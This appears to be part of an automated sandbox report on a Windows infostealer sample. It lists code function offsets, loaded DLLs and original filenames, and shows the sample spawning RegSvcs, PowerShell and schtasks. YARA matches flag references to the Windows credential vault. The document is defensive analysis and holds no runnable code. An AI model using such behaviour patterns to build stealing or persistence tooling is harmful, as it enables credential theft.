                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DDB2DF9_2_05DDB2DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DDC2389_2_05DDC238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD7E409_2_05DD7E40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DDE4589_2_05DDE458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD77609_2_05DD7760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD00409_2_05DD0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD5D9B9_2_05DD5D9B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD00079_2_05DD0007
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_0157DC7410_2_0157DC74
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F004010_2_077F0040
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F062010_2_077F0620
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F061110_2_077F0611
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077FE56510_2_077FE565
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F85D010_2_077F85D0
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F733010_2_077F7330
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077FA24810_2_077FA248
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F000710_2_077F0007
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F5FA010_2_077F5FA0
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F6EF810_2_077F6EF8
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F8EA810_2_077F8EA8
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F6AC010_2_077F6AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016341D814_2_016341D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0163E95914_2_0163E959
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01634AA814_2_01634AA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0163ACF814_2_0163ACF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01633E9014_2_01633E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06AEA89414_2_06AEA894
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06AEA57814_2_06AEA578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06AEBDF014_2_06AEBDF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06AEDBF014_2_06AEDBF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B066B014_2_06B066B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0565814_2_06B05658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B07E4014_2_06B07E40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0352014_2_06B03520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0B2DF14_2_06B0B2DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0C23814_2_06B0C238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0776014_2_06B07760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0E45814_2_06B0E458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B05D9B14_2_06B05D9B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0004014_2_06B00040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06F226E014_2_06F226E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06B0000614_2_06B00006
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2107866029.0000000007360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename998c6b64-d31b-4897-94c4-e99cc95bcd98.exe4 vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000000.2057043617.00000000008C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHGCt.exe< vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104108311.0000000002E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename998c6b64-d31b-4897-94c4-e99cc95bcd98.exe4 vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2108110232.0000000007B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2102397332.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs oBMlky3Rkm7h5QK.exe
                    Source: oBMlky3Rkm7h5QK.exeBinary or memory string: OriginalFilenameHGCt.exe< vs oBMlky3Rkm7h5QK.exe
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ECXXCuFHUVw.exe.46edac8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ECXXCuFHUVw.exe.46edac8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ECXXCuFHUVw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
